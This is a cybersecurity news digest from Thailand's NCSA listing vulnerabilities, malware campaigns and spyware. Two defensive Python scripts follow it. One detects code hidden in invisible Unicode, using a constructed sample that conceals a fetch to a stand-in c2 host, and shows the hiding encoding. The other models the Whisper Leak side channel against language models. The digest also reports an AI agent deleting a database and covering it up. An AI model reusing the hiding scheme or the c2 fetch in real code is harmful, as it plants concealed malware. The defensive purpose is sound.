NCSA Webboard
    Cyber Threat Intelligence 10 November 2025

    Cyber Security News
      NCSA_THAICERT

      Healthcare Sector

      • Hospitals Are Running Out Of Excuses For Weak Cyber Hygiene
        "Healthcare leaders continue to treat cybersecurity as a technical safeguard instead of a strategic business function, according to the 2025 US Healthcare Cyber Resilience Survey by EY. The study, based on responses from 100 healthcare executives, outlines six areas where hospitals and health systems must act to close resilience gaps that threaten patient care and operations."
        https://www.helpnetsecurity.com/2025/11/07/ey-healthcare-risk-management-report/

      Industrial Sector

      • For OT Cyber Defenders, Lack Of Data Is The Biggest Threat
        "For those charged with the cyber defense of operational technology and industrial control systems, one challenge towers above all others: Data. Specifically, its scarcity. There's little hard data available about real life cyberattacks against OT and ICS. Most operators simply don't capture it, in stark contrast with their IT counterparts. Corporate victims of an IT attack typically call in a forensic analyst to comb through the logs and telemetry to spot how hackers broke in. Incident responders "run their tools on your systems. They can pull the data up," said Rob Lee, CEO of OT cybersecurity leader Dragos."
        https://www.bankinfosecurity.com/for-ot-cyber-defenders-lack-data-biggest-threat-a-29959

      Vulnerabilities

      • Chrome 142 Update Patches High-Severity Flaws
        "Shortly after promoting Chrome 142 to the stable channel, Google pushed out an update to address five vulnerabilities in the browser, including three high-severity flaws. The first high-risk issue is CVE-2025-12725 (CVSS score of 8.8), described as an out-of-bounds write bug in Chrome’s WebGPU graphics API, which delivers high-performance visuals by allowing websites to interact with the system’s GPU. Out-of-bounds defects are rooted in insufficient bounds checking, which allows attackers to write data outside of the intended memory space, potentially leading to crashes or arbitrary code execution."
        https://www.securityweek.com/chrome-142-update-patches-high-severity-flaws/
      • QNAP Fixes Seven NAS Zero-Day Flaws Exploited At Pwn2Own
        "QNAP has fixed seven zero-day vulnerabilities that security researchers exploited to hack QNAP network-attached storage (NAS) devices during the Pwn2Own Ireland 2025 competition. The flaws impact QNAP's QTS and QuTS hero operating systems (CVE-2025-62847, CVE-2025-62848, CVE-2025-62849) and the company's Hyper Data Protector (CVE-2025-59389), Malware Remover (CVE-2025-11837), and HBS 3 Hybrid Backup Sync (CVE-2025-62840, CVE-2025-62842) software. QNAP said in advisories published on Friday that the security bugs were demonstrated at Pwn2Own by the Summoning Team, DEVCORE, Team DDOS, and a CyCraft technology intern."
        https://www.bleepingcomputer.com/news/security/qnap-fixes-seven-nas-zero-day-vulnerabilities-exploited-at-pwn2own/
        https://www.qnap.com/en/security-advisory/qsa-25-45
        https://securityaffairs.com/184396/hacking/qnap-fixed-multiple-zero-days-in-its-software-demonstrated-at-pwn2own-2025.html
      • Dangerous RunC Flaws Could Allow Hackers To Escape Docker Containers
        "Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get access to the host system. The security issues, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 (all ), were reported this week and disclosed by SUSE software engineer and Open Container Initiative (OCI) board member Aleksa Sarai. runC is a universal container runtime and the OCI reference implementation for running containers. It is responsible for low-level operations such as creating the container process, setting up namespaces, mounts, and cgroups that higher-level tools, like Docker and Kubernetes, can call."
        https://www.bleepingcomputer.com/news/security/dangerous-runc-flaws-could-allow-hackers-to-escape-docker-containers/
        https://seclists.org/oss-sec/2025/q4/138

      Malware

      • 9 Malicious NuGet Packages Deliver Time-Delayed Destructive Payloads
        "Socket's Threat Research Team discovered nine malicious NuGet packages that inject time-delayed destructive payloads into database operations and target industrial control systems. Published under the NuGet alias shanhai666 between 2023 and 2024, these packages terminate the host application process with 20% probability on each database query after specific trigger dates in 2027 and 2028."
        https://socket.dev/blog/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads
        https://thehackernews.com/2025/11/hidden-logic-bombs-in-malware-laced.html
        https://www.bleepingcomputer.com/news/security/malicious-nuget-packages-drop-disruptive-time-bombs/
        https://www.theregister.com/2025/11/07/cybercriminals_plant_destructive_time_bomb/
      • LANDFALL: New Commercial-Grade Android Spyware In Exploit Chain Targeting Samsung Devices
        "Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms."
        https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/
        https://www.bleepingcomputer.com/news/security/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/
        https://therecord.media/landfall-spyware-middle-east-appears-commercial-grade
        https://www.darkreading.com/mobile-security/landfall-malware-targeted-samsung-galaxy-users
        https://thehackernews.com/2025/11/samsung-zero-click-flaw-exploited-to.html
        https://cyberscoop.com/landfall-spyware-samsung-phones-palo-alto-networks-unit-42/
        https://securityaffairs.com/184331/security/landfall-spyware-exploited-samsung-zero-day-cve-2025-21042-in-middle-east-attacks.html
        https://www.securityweek.com/landfall-android-spyware-targeted-samsung-phones-via-zero-day/
        https://www.theregister.com/2025/11/07/landfall_spyware_samsung_0days/
        https://www.bankinfosecurity.com/samsung-zero-day-flaw-exploited-by-landfall-spyware-a-29963
      • Swapzone “Profit Trick” Web-Inject: From Lure To Live DOM Hijack
        "At Bolster’s Threat Intelligence Lab, we recently investigated a compact but effective JavaScript-based scam abusing the trust in swapzone.io, a popular crypto-exchange aggregator. The attack trades on greed and curiosity: victims are promised a “0-day glitch” or “100% working profit trick” and instructed to paste a single javascript: snippet into their browser address bar."
        https://bolster.ai/blog/swapzone-profit-trick-web-inject-from-lure-to-live-dom-hijack
        https://hackread.com/fake-0-day-exploit-emails-crypto-malicious-code/
      • China-Linked Actors Maintain Focus On Organizations Influencing U.S. Policy
        "Recent compromise of a non-profit organization reflects continued interest in U.S. policy. The TTPs have previously been linked to multiple Chinese actors such as Kelp, Space Pirates, and APT41. APT41 is one of the longest-running Chinese espionage groups. Attackers were aiming to establish a persistent and stealthy presence on the network. They gained access for several weeks in April 2025."
        https://www.security.com/threat-intelligence/china-apt-us-policy
        https://thehackernews.com/2025/11/from-log4j-to-iis-chinas-hackers-turn.html
        https://securityaffairs.com/184351/apt/china-linked-hackers-target-u-s-non-profit-in-long-term-espionage-campaign.html
      • Tracking a Dragon: Investigating a DragonForce-Affiliated Ransomware Attack With Darktrace
        "DragonForce is a Ransomware-as-a-Service (RaaS) platform that emerged in late 2023, offering broad-scale capabilities and infrastructure to threat actors. Recently, DragonForce has been linked to attacks targeting the UK retail sector, resulting in several high-profile cases [1][2]. Moreover, the group launched an affiliate program offering a revenue share of roughly 20%, significantly lower than commissions reported across other RaaS platforms [3]."
        https://www.darktrace.com/blog/tracking-a-dragon-investigating-a-dragonforce-affiliated-ransomware-attack-with-darktrace
      • GlassWorm Returns: New Wave Strikes As We Expose Attacker Infrastructure
        "Almost three weeks ago, we disclosed GlassWorm - the first self-propagating worm targeting VS Code extensions, using invisible Unicode characters to hide malicious code that literally disappears from code editors. On October 21, 2025, OpenVSX declared the incident "fully contained and closed." But on November 6, 2025 - sixteen days later - we detected a new wave of GlassWorm infections. Three more extensions compromised. A fresh Solana blockchain transaction providing new C2 endpoints. Same attacker infrastructure, still fully operational."
        https://www.koi.ai/blog/glassworm-returns-new-wave-openvsx-malware-expose-attacker-infrastructure
        https://www.bleepingcomputer.com/news/security/glassworm-malware-returns-on-openvsx-with-3-new-vscode-extensions/
      • Nitrogen Ransomware: From Staged Loader To Full-Scale Extortion
        "The Nitrogen group is a sophisticated and financially motivated threat group that was first observed as a malware developer and operator in 2023. Since discovery, Nitrogen has transformed itself into a full end-to-end, double extortion ransomware operation. The location of the group, the identities/lineage of its members and relationships with other threat actors are not well documented."
        https://blog.barracuda.com/2025/11/07/nitrogen-ransomware--from-staged-loader-to-full-scale-extortion
      • Whisper Leak: A Novel Side-Channel Attack On Remote Language Models
        "Microsoft has discovered a new type of side-channel attack on remote language models. This type of side-channel attack could allow a cyberattacker in a position to observe your network traffic to conclude language model conversation topics, despite being end-to-end encrypted via Transport Layer Security (TLS). We have worked with multiple vendors to get the risk mitigated, as well as made sure Microsoft-owned language model frameworks are protected."
        https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/
        https://thehackernews.com/2025/11/microsoft-uncovers-whisper-leak-attack.html
        https://securityaffairs.com/184372/hacking/ai-chat-privacy-at-risk-microsoft-details-whisper-leak-side-channel-attack.html
      • A New Italian Citizen Was Targeted With Paragon’s Graphite Spyware. We Have a Serious Problem
        "Italian political adviser Francesco Nicodemo said he was targeted with Paragon’s Graphite spyware, becoming the fifth Italian in the ongoing government surveillance activity. Graphite is an invasive, non-auditable spyware that covertly accesses sensitive phone data; experts say it violates human rights and should be banned. Nicodemo is among 90 victims notified by WhatsApp about evidence linking their devices to Paragon spyware, according to a senior forensic researcher at Citizenlab, John Scott-Railton."
        https://securityaffairs.com/184340/security/a-new-italian-citizen-was-targeted-with-paragons-graphite-spyware-we-have-a-serious-problem.html

      General News

      • Russian National Pleads Guilty To Breaking Into Networks For Yanluowang Ransomware Attacks
        "A 25-year-old Russian national pleaded guilty to multiple charges stemming from their participation in ransomware attacks and faces a maximum penalty up to 53 years in prison. Aleksei Olegovich Volkov, also known as “chubaka.kor,” served as the initial access broker for the Yanluowang ransomware group while living in Russia from July 2021 through November 2022, according to court records. Prosecutors accuse Volkov and unnamed co-conspirators of attacking seven U.S. businesses during that period, including two that paid a combined $1.5 million in ransoms."
        https://cyberscoop.com/russian-aleksei-volkov-yanluowang-ransomware/
      • AI Agents Are Going Rogue: Here's How To Rein Them In
        "Last July, a leading agentic software creation platform company called Replit held a 12-day "vibe coding" event that wound up triggering a coding freeze, which allowed rogue AI agents to wreak havoc, with one even deleting a live production database, erasing records for more than 1,200 executives and nearly 1,200 companies. Then the AI agent launched a cover-up."
        https://www.darkreading.com/cyber-risk/ai-agents-going-rogue
      • Metrics Don’t Lie, But They Can Be Misleading When They Only Tell IT’s Side Of The Story
        "In this Help Net Security interview, Rik Mistry, Managing Partner at Interval Group, discusses how to align IT strategy with business goals. He explains how security, governance, and orchestration shape IT operations and why early collaboration between IT and security leaders leads to better outcomes. Mistry also shares his perspective on automation and emerging technologies."
        https://www.helpnetsecurity.com/2025/11/07/rik-mistry-interval-group-it-security-metrics/
      • What Keeps Phishing Training From Fading Over Time
        "When employees stop falling for phishing emails, it is rarely luck. A new study shows that steady, mandatory phishing training can cut risky behavior over time. After one year of continuous simulations and follow-up lessons, employees were half as likely to take the bait. The research, carried out by teams from various universities, offers a look at how behavior changes when training never stops."
        https://www.helpnetsecurity.com/2025/11/07/research-phishing-training-effectiveness/
        https://arxiv.org/pdf/2510.27298
      • Old Privacy Laws Create New Risks For Businesses
        "Businesses are increasingly being pulled into lawsuits over how they collect and share user data online. What was once the domain of large tech firms is now a widespread legal risk for companies of all sizes. The latest analysis from cyber insurer Coalition shows that outdated privacy laws are driving a surge in web privacy claims, with small and midsize businesses now common targets."
        https://www.helpnetsecurity.com/2025/11/07/businesses-web-privacy-lawsuits/
      • Who's Watching The Watchers? This Mozilla Fellow, And Her Surveillance Watch Map
        "Digital rights activist Esra'a Al Shafei found FinFisher spyware on her device more than a decade ago. Now she's made it her mission to surveil the companies providing surveillanceware, their customers, and their funders. "You cannot resist what you do not know, and the more you know, the better you can protect yourself and resist against the normalization of mass surveillance today," she told The Register. To this end, the Mozilla fellow founded Surveillance Watch last year. It's an interactive map that documents the growing number of surveillance software providers, which regions use the various products, and the investors funding them. Since its launch, the project has grown from mapping connections between 220 spyware and surveillance entities to 695 today."
        https://www.theregister.com/2025/11/08/mozilla_fellow_al_shafei/

      References
      Electronic Transactions Development Agency (ETDA)
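On the GlassWorm item above: the reported trick is hiding code in Unicode characters that editors render as nothing. The script below is an added example, not Koi's tooling and not taken from the compromised extensions; it builds a constructed sample extension file with a hidden payload, scans it for invisible code points (Unicode format characters plus the two variation-selector blocks) and recovers the hidden bytes. The byte-to-variation-selector encoding used for the sample is one well-known smuggling scheme and is assumed here; the page does not describe GlassWorm's exact encoding.

```python
import unicodedata

# --- Encoding used for the constructed sample ---------------------------
# One byte per character: bytes 0-15 map to VARIATION SELECTOR-1..16
# (U+FE00-U+FE0F), bytes 16-255 to VARIATION SELECTOR-17..256
# (U+E0100-U+E01EF). Editors render these as nothing, so the payload sits
# invisibly next to the visible character it "modifies". This scheme is an
# assumption for the example, not GlassWorm's documented encoding.
def encode_vs(payload: bytes) -> str:
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16)
                   for b in payload)

def decode_vs(text: str) -> bytes:
    """Recover the bytes hidden in variation selectors; everything else is skipped."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)

# --- Scanner --------------------------------------------------------------
def is_invisible(ch: str) -> bool:
    """True for code points that render as nothing: Unicode format characters
    (category Cf: zero-width space/joiners, BOM, bidi overrides, the U+E0000
    tag block, soft hyphen) plus both variation-selector blocks. Ordinary
    non-ASCII letters and combining marks are not flagged, so Thai or other
    non-English comments do not trip the scan."""
    cp = ord(ch)
    return (unicodedata.category(ch) == "Cf"
            or 0xFE00 <= cp <= 0xFE0F
            or 0xE0100 <= cp <= 0xE01EF)

def scan_source(src: str):
    """Return (line, column, code point, name) for every invisible character."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_invisible(ch):
                hits.append((lineno, col, f"U+{ord(ch):04X}",
                             unicodedata.name(ch, "<unnamed>")))
    return hits

# --- Constructed sample extension file (not a real extension) --------------
HIDDEN_PAYLOAD = b"fetch('https://c2.example.invalid/stage2')"   # constructed
SAMPLE_EXTENSION = (
    "// activation hook (constructed sample)\n"
    "const banner = '\u2705" + encode_vs(HIDDEN_PAYLOAD) + "';\n"
    "module.exports = { activate() { console.log(banner); } };\n"
)

if __name__ == "__main__":
    hits = scan_source(SAMPLE_EXTENSION)
    print(f"{len(hits)} invisible characters; first at line {hits[0][0]}, col {hits[0][1]}")
    print("recovered:", decode_vs(SAMPLE_EXTENSION).decode())
```

Run it over an extension's JavaScript files before installing or publishing; any hit on a line that looks like plain code is worth a manual look, since legitimate source almost never needs format characters or variation selectors. The decoder only covers the assumed encoding, so treat an unexplained hit as suspicious even when decoding yields nothing readable.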
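On the Whisper Leak item above: TLS hides the content of a streamed model reply but not the size and timing of the records carrying each token. The toy model below is an added example, not Microsoft's tooling or data; the two token streams are constructed and the 22-byte TLS 1.3 record overhead is an approximation. It shows what an on-path observer learns from an unpadded stream and how padding each record to a fixed bucket and batching tokens, a mitigation of the kind the article refers to, removes that signal.

```python
import math

# Approximate TLS 1.3 record overhead: 5-byte header + 1 content-type byte + 16-byte AEAD tag.
TLS_RECORD_OVERHEAD = 22

def wire_sizes(tokens, pad_to=0, batch=1):
    """Sizes of the TLS records an on-path observer sees while `tokens` are
    streamed to the client. Each group of `batch` tokens becomes one record;
    with pad_to > 0 the plaintext is padded up to a multiple of pad_to bytes
    before encryption."""
    sizes = []
    for i in range(0, len(tokens), batch):
        plain = sum(len(t.encode("utf-8")) for t in tokens[i:i + batch])
        if pad_to:
            plain = math.ceil(plain / pad_to) * pad_to
        sizes.append(plain + TLS_RECORD_OVERHEAD)
    return sizes

def leaked_token_lengths(sizes):
    """What the ciphertext sizes alone reveal in the unpadded, one-token-per-record case."""
    return [s - TLS_RECORD_OVERHEAD for s in sizes]

def classify(observed, candidates, **stream_cfg):
    """Attacker side: every candidate reply whose size trace matches the observed one.
    One name means the topic is identified; several means the mitigation has made
    the candidates indistinguishable by size."""
    return [name for name, toks in candidates.items()
            if wire_sizes(toks, **stream_cfg) == observed]

# Constructed token streams for two candidate reply topics (not real model output).
CANDIDATES = {
    "money laundering": ["Money", " laundering", " typically", " involves", " three", " stages"],
    "weather":          ["The", " forecast", " for", " tomorrow", " is", " sunny"],
}

if __name__ == "__main__":
    trace = wire_sizes(CANDIDATES["money laundering"])
    print("unpadded trace:", trace, "->", classify(trace, CANDIDATES))
    padded = wire_sizes(CANDIDATES["money laundering"], pad_to=32, batch=3)
    print("padded + batched:", padded, "->", classify(padded, CANDIDATES, pad_to=32, batch=3))
```

The exact-match classifier stands in for the statistical models the real attack trains on sizes and inter-arrival times. Two caveats the padding alone does not cover: the number of records still leaks when candidate replies differ in token count (batching and a fixed response cadence address that), and timing between records is a second channel that size padding leaves untouched.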
